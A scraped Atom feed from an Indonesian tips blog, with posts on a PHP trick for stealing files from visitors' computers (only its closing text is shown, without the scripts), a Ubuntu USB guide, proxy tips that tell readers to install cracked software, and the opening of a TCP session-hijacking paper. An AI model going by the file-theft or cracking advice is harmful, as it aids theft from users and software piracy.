/&gt;http://situskamu.com/scrcuri.php , ingat!!! konfigurasi harus cocok lho... biar kamu gampang,&lt;br /&gt;simpan aja kedua file di root server kamu jadi, file upload.php diakses pada&lt;br /&gt;http://situskamu.com/upload.php. Udah ngerti??... Yap... aku harap begitu.. he..he..he.&lt;br /&gt;Untuk coba-coba akseslah script scrcuri.php pada lingkungan windows... apa yang terjadi???&lt;br /&gt;Wowww... sebuah file autoexec.bat telah menyisip diserver kamu,&lt;br /&gt;alias diambil dari komputer client kamu sebagai percobaan.&lt;br /&gt;Sebelum kamu merasa puas, perlu anda ketahui bahwa script diatas,&lt;br /&gt;belum sempurna (Makanya jangan puas dulu.... ). Mau tau kekurangannya ???..&lt;br /&gt;Yeahhh... saya tau kamu juga tau iya khan???. Kita ketahui, pada file percobaan kita...&lt;br /&gt;hanya mampu mengambil file tertentu saja yang belum tentu ada dikomputer target.&lt;br /&gt;Misalkan aja file c:\tomero.gif , otomatis semua komputer belum tentu punya file kayak gitu.&lt;br /&gt;So, solusinya.. tambahkan aja javascript dan manipulasi dikit kedua script diatas... Tau khan..&lt;br /&gt;k'lo ngga tau biarin aja buat PR dirumah atau bila perlu belajar PHP dulu yang buaaanyaaakk.&lt;br /&gt;Ngga bisa juga?? Jurus yang paling jitu adalah "Tanya TOMERO, Copy-Paste aja..."&lt;br /&gt;Dasar orang males...he..he..he..&lt;br /&gt;Akhirnya, sekali lagi... segala sesuatu yang terdapat pada info ini,&lt;br /&gt;kegunaanya ada ditangan anda.&lt;br /&gt;Saya cuma menulis dan mengembangkan ide dengan madsud agar anda berhati-hati dengan dunia Internet walaupun&lt;br /&gt;terbilang asyikkk... Maafkan, jika ada kesalahan atau hal yang kurang berkenan dihati anda.&lt;br /&gt;Terima kasih. Tuhan Memberkati....&lt;br /&gt;&lt;br /&gt;Referensi :&lt;br /&gt;www.php.net&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-9069804994898910637?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/9069804994898910637/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/bahaya-pencurian-file-pada-komputer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/9069804994898910637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/9069804994898910637'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/bahaya-pencurian-file-pada-komputer.html' title='Bahaya pencurian file pada komputer client menggunakan script PHP'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-5237019939683929965</id><published>2010-06-06T00:52:00.000-07:00</published><updated>2010-06-06T00:54:33.403-07:00</updated><title type='text'>Membuat flashdisk bootable Ubuntu 7.10</title><content type='html'>Membuat Flashdisk bootable yang isinya Live CD Ubuntu 7.10 lewat windows ternyata tidak sesulit yang kita bayangkan, langkah - langkahnya adalah sebagai berikut :&lt;br /&gt;&lt;br /&gt;Download dulu file syslinux disini http://freshmeat.net/redir/syslinux/10177/url_zip/syslinux-3.51.zip &lt;br /&gt;Buat directory syslinux di C:&lt;br /&gt;Kemudian extract file yang kita download tadi ke folder C:\syslinux&lt;br /&gt;Pada command promt windows masuk ke direktory c\:syslinux\win32&lt;br /&gt;Gunakan perintah berikut untuk membuat usb bisa sebagai bootable disk : syslinux -s F: ( asumsi usb drive di F )&lt;br /&gt;Langkah selanjutnya adalah mengcopy semua file di Ubuntu 7.10 Live CD ke dalam USB, sebaiknya gunakan command xcopy /e /h /k d:\*.* f: (D sebagai CDROM).&lt;br /&gt;Selanjutnya USB flash sudah bisa di gunakan sebagai penganti Ubuntu 7.10 Gutsy Ribbon Live CD&lt;br /&gt;Semoga bermanfaat..!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-5237019939683929965?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/5237019939683929965/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/membuat-flashdisk-bootable-ubuntu-710.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5237019939683929965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5237019939683929965'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/membuat-flashdisk-bootable-ubuntu-710.html' title='Membuat flashdisk bootable Ubuntu 7.10'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1719214419575303852</id><published>2010-06-03T04:30:00.000-07:00</published><updated>2010-06-03T04:57:19.120-07:00</updated><title type='text'>Trik meningkatkan kecepatan internet via proxy</title><content type='html'>buat kamu yang belum tau aja! yang udah tau biarlah berlalu, disini gue aja kamu meningkatkan internet via proxy&lt;br /&gt;&lt;br /&gt;yang penting tidak melakukan hal curang yaaa?&lt;br /&gt;Siapin free proxy kunjungi aja di free proxy atau ke kakek google&lt;br /&gt;satu software aja gak ribet bisa pake Proxyder,Proxylish,atau yang lain.&lt;br /&gt;yang gue pake ini Proxifier&lt;br /&gt;&lt;br /&gt;kita langsung aja? biar gak ribet ribet&lt;br /&gt;install dulu Proxifier setelah itu copas cracknya atau keygen, buka lish proxy dan programnya.&lt;br /&gt;dipojok kiri layar akan terlihat ikon baru klik 2x pilih options dan cari proxification rules:&lt;br /&gt;disitu kan akan keluar area baru pilih proses only the blablablabla dan klik oke.&lt;br /&gt;&lt;br /&gt;abis itu pilih ikon DNS search&lt;br /&gt;buka centang pada choouse the mode automatically&lt;br /&gt;pilih dan centang Remotely&lt;br /&gt;pilih oke.&lt;br /&gt;&lt;br /&gt;dan abis itu buka lagi options pilih proxy settings&lt;br /&gt;&lt;br /&gt;tinggal isi deh proxy yang kamu sukai&lt;br /&gt;dengan cara klik add dan akan menujuh Proxy server&lt;br /&gt;jika proxy yang anda miliki mengarah ke HTTPS atau SOCK5 pilih salah satu, jika memakai keduanya memang menambahkan kecepatan lebih abis itu mudah error atau down.&lt;br /&gt;lebih baik pilih yang HTTPS dan addrees serta proxy di ini sesuai tujuah. abis itu di restart deh jaringannya biar koneksinya makin kenceng.&lt;br /&gt;&lt;br /&gt;tips buat ini:&lt;br /&gt;biar tambah jreng proxy dan port pake pake proxynya warnet yang joss dan proxy server di warnet jika anda pakai laptop via wifi.&lt;br /&gt;atau guna in langsung koneksi port dan proxy server wifi serta port dan proxy laptop milik anda.&lt;br /&gt;lumayan naik 2x dari pada 1x doang, yang pasti jangan gunain port dan proxy milik teman kita yang aktif kasin entar lemot kagak karuan.&lt;br /&gt;&lt;br /&gt;Form biding (trim Kaci)&lt;br /&gt;penulis : Xsharingan(alias STY setengah tuek)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1719214419575303852?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1719214419575303852/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/trik-meningkatkan-kecepatan-internet.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1719214419575303852'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1719214419575303852'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/trik-meningkatkan-kecepatan-internet.html' title='Trik meningkatkan kecepatan internet via proxy'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-9213463347298730897</id><published>2010-04-13T06:47:00.000-07:00</published><updated>2010-04-13T06:53:12.270-07:00</updated><title type='text'>IPHIJACK</title><content type='html'>Passive attacks using sniffers are becoming more and more&lt;br /&gt;frequent on the Internet. The attacker obtains a user id and password&lt;br /&gt;that allows him to logon as that user. In order to prevent such attacks&lt;br /&gt;people have been using identification schemes such as one-time password&lt;br /&gt;[skey] or ticketing identification [kerberos]. Though&lt;br /&gt;they prevent password sniffing on an unsecure network these methods&lt;br /&gt;are still vulnerable to an active attack as long as they neither&lt;br /&gt;encrypt nor sign the data stream. [Kerberos also provides an&lt;br /&gt;encrypted TCP stream option.] Still many people are complacent believing&lt;br /&gt;that active attacks are very difficult and hence a lesser risk.&lt;br /&gt;&lt;br /&gt;        The following paper describes an extremely simple active attack&lt;br /&gt;which has been successfully used to break into Unix hosts and&lt;br /&gt;which can be done with the same resources as for a passive sniffing&lt;br /&gt;attack. [The attacks have been performed with a test software&lt;br /&gt;and the users were aware of the attack.  Although we do not have any&lt;br /&gt;knowledge of such an attack being used on the Internet, it may&lt;br /&gt;be possible.] Some uncommon  behaviors of the TCP protocol are also&lt;br /&gt;presented as well as some real examples and statistical studies of the&lt;br /&gt;attack's impact on the network.  Finally some detection and prevention&lt;br /&gt;schemes are explained. In order to help any reader unfamiliar with the&lt;br /&gt;subtleties of the TCP protocol the article starts with a short&lt;br /&gt;description of TCP.&lt;br /&gt;&lt;br /&gt;        The reader can also refers to another attack by R. Morris&lt;br /&gt;presented in [morris85]. Though the following attack is related&lt;br /&gt;to Morris' one, it is more widely usable on any TCP connection.&lt;br /&gt;In section 7 we present and compare this attack with&lt;br /&gt;the present one.&lt;br /&gt;&lt;br /&gt;        The presentation of the attack will be divided into three parts:&lt;br /&gt;the ``Established State'' which is the state where the session is open&lt;br /&gt;and data is exchanged; the set up (or opening) of such a session; and&lt;br /&gt;finally some real examples.&lt;br /&gt;&lt;br /&gt;2. Established State&lt;br /&gt;&lt;br /&gt;2.1 The TCP protocol&lt;br /&gt;&lt;br /&gt;        This section offers a short description of the TCP protocol.&lt;br /&gt;For more details the reader can refer to [rfc793]. TCP provides a&lt;br /&gt;full duplex reliable stream connection between two end points. A&lt;br /&gt;connection is uniquely defined by the quadruple (IP address of sender,&lt;br /&gt;TCP port number of the sender, IP address of the receiver, TCP port&lt;br /&gt;number of the receiver). Every byte that is sent by a host is marked with a&lt;br /&gt;sequence number (32 bits integer) and is acknowledged by the receiver&lt;br /&gt;using this sequence number. The sequence number for the first byte sent&lt;br /&gt;is computed during the connection opening. It changes for any new&lt;br /&gt;connection based on rules designed to avoid reuse of the same sequence&lt;br /&gt;number for two different sessions of a TCP connection.&lt;br /&gt;&lt;br /&gt;        We shall assume in this document that one point of the&lt;br /&gt;connection acts as a server (for instance a telnet server) and the&lt;br /&gt;other as the client.  The following terms will be used:&lt;br /&gt;&lt;br /&gt;        SVR_SEQ: sequence number of the next byte to be sent&lt;br /&gt;        by the server;&lt;br /&gt;        SVR_ACK: next byte to be received by the server&lt;br /&gt;        (the sequence number of the last byte received plus one);&lt;br /&gt;        SVR_WIND: server's receive window;&lt;br /&gt;        CLT_SEQ: sequence number of the next byte to be sent by&lt;br /&gt;        the client;&lt;br /&gt;        CLT_ACK: next byte to be received by the client;&lt;br /&gt;        CLT_WIND: client's receive window;&lt;br /&gt;&lt;br /&gt;        At the beginning when no data has been exchanged we have&lt;br /&gt;SVR_SEQ = CLT_ACK and CLT_SEQ = SVR_ACK. These equations&lt;br /&gt;are also true when the connection is in a 'quiet' state (no data being&lt;br /&gt;sent on each side).  They are not true during transitory states when&lt;br /&gt;data is sent.  The more general equations are:&lt;br /&gt;&lt;br /&gt;        CLT_ACK &lt;= SVR_SEQ &lt;= CLT_ACK + CLT_WIND&lt;br /&gt;        SVR_ACK &lt;= CLT_SEQ &lt;= SVR_ACK + SVR_WIND&lt;br /&gt;&lt;br /&gt;The TCP packet header fields are:&lt;br /&gt;&lt;br /&gt;        Source Port:            The source port number;&lt;br /&gt;        Destination Port:       The destination port number;&lt;br /&gt;        Sequence number:        The sequence number of the first&lt;br /&gt;                                byte in this packet;&lt;br /&gt;        Acknowledgment Number:  The expected sequence number&lt;br /&gt;                                        of the next byte to be received;&lt;br /&gt;        Data Offset:            Offset of the data in the packet;&lt;br /&gt;        Control Bits:&lt;br /&gt;&lt;br /&gt;                URG:  Urgent Pointer;&lt;br /&gt;                ACK:  Acknowledgment;&lt;br /&gt;                PSH:  Push Function;&lt;br /&gt;                RST:  Reset the connection;&lt;br /&gt;                SYN:  Synchronize sequence numbers;&lt;br /&gt;                FIN:  No more data from sender;&lt;br /&gt;&lt;br /&gt;        Window:         Window size of the sender;&lt;br /&gt;        Checksum:       TCP checksum of the header and data;&lt;br /&gt;        Urgent Pointer: TCP urgent pointer;&lt;br /&gt;        Options:                TCP options;&lt;br /&gt;&lt;br /&gt; - SEG_SEQ will refer to the packet sequence number (as&lt;br /&gt;seen in the header).&lt;br /&gt; - SEG_ACK will refer to the packet acknowledgment number.&lt;br /&gt; - SEG_FLAG will refer to the control bits.&lt;br /&gt;&lt;br /&gt;On a typical packet sent by the client (no retransmission) SEG_SEQ is set&lt;br /&gt;to CLT_SEQ, SEG_ACK to CLT_ACK.&lt;br /&gt;&lt;br /&gt;        TCP uses a ``three-way handshake'' to establish a new&lt;br /&gt;connection. If we suppose that the client initiates the connection to&lt;br /&gt;the server and that no data is exchanged, the normal packet exchange&lt;br /&gt;is (C.f. Figure 1):&lt;br /&gt;&lt;br /&gt; - The connection on the client side is on the CLOSED state.&lt;br /&gt;The one on the server side is on the LISTEN state.&lt;br /&gt; - The client first sends its initial sequence number and sets the SYN bit:&lt;br /&gt;&lt;br /&gt;        SEG_SEQ  =  CLT_SEQ_0,&lt;br /&gt;        SEG_FLAG  =  SYN&lt;br /&gt;&lt;br /&gt;Its state is now SYN-SENT&lt;br /&gt; - On receipt of this packet the server acknowledges the client sequence&lt;br /&gt;number, sends its own initial sequence number and sets the SYN bit:&lt;br /&gt;&lt;br /&gt;        SEG_SEQ  =  SVR_SEQ_0,&lt;br /&gt;        SEQ_ACK  =  CLT_SEQ_0+1,&lt;br /&gt;        SEG_FLAG  =  SYN&lt;br /&gt;&lt;br /&gt;and set&lt;br /&gt;&lt;br /&gt;        SVR_ACK=CLT_SEQ_0+1&lt;br /&gt;&lt;br /&gt;Its state is now SYN-RECEIVED&lt;br /&gt; - On receipt of this packet the client acknowledges the server&lt;br /&gt;sequence number:&lt;br /&gt;&lt;br /&gt;        SEG_SEQ  =  CLT_SEQ_0+1,&lt;br /&gt;        SEQ_ACK  =  SVR_SEQ_0+1&lt;br /&gt;&lt;br /&gt;and sets CLT_ACK=SVR_SEQ_0+1&lt;br /&gt;Its state is now ESTABLISHED&lt;br /&gt; - On receipt of this packet the server enters the ESTABLISHED state. We now&lt;br /&gt;have:&lt;br /&gt;&lt;br /&gt;        CLT_SEQ  =  CLT_SEQ_0+1&lt;br /&gt;        CLT_ACK  =  SVR_SEQ_0+1&lt;br /&gt;        SVR_SEQ  =  SVR_SEQ_0+1&lt;br /&gt;        SVR_ACK  =  CLT_SEQ_0+1&lt;br /&gt;&lt;br /&gt;Server                                          Client&lt;br /&gt;LISTEN                                          CLOSED&lt;br /&gt;&lt;br /&gt;                    &lt;-  SYN,&lt;br /&gt;                        CLT_SEQ_0&lt;br /&gt;&lt;br /&gt;LISTEN                                          SYN-SENT&lt;br /&gt;&lt;br /&gt;                        SYN,        -&gt;&lt;br /&gt;                        SVR_SEQ_0,&lt;br /&gt;                        CLT_SEQ_0+1&lt;br /&gt;&lt;br /&gt;SYN-RECEIVED                                    ESTABLISHED&lt;br /&gt;&lt;br /&gt;                                                SVR_SEQ = CLT_SEQ_0 + 1&lt;br /&gt;                                                CLT_ACK = SVR_SEQ_0 + 1&lt;br /&gt;&lt;br /&gt;                    &lt;-  ACK,&lt;br /&gt;                        CLT_SEQ_0 + 1&lt;br /&gt;                        SVR_SEQ_0+1&lt;br /&gt;&lt;br /&gt;ESTABLISHED&lt;br /&gt;&lt;br /&gt;SVR_SEQ = SVR_SEQ_0 + 1&lt;br /&gt;SVR_ACK = CLT_SEQ_0 + 1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;                figure 1: Example of a connection opening&lt;br /&gt;&lt;br /&gt;        Closing a connection can be done by using the FIN or the RST&lt;br /&gt;flag.  If the RST flag of a packet is set the receiving host enters the&lt;br /&gt;CLOSED state and frees any resource associated with this instance of&lt;br /&gt;the connection.  The packet is not acknowledged. Any new incoming&lt;br /&gt;packet for that connection will be dropped.&lt;br /&gt;&lt;br /&gt;If the FIN flag of a packet is set the receiving host enters 
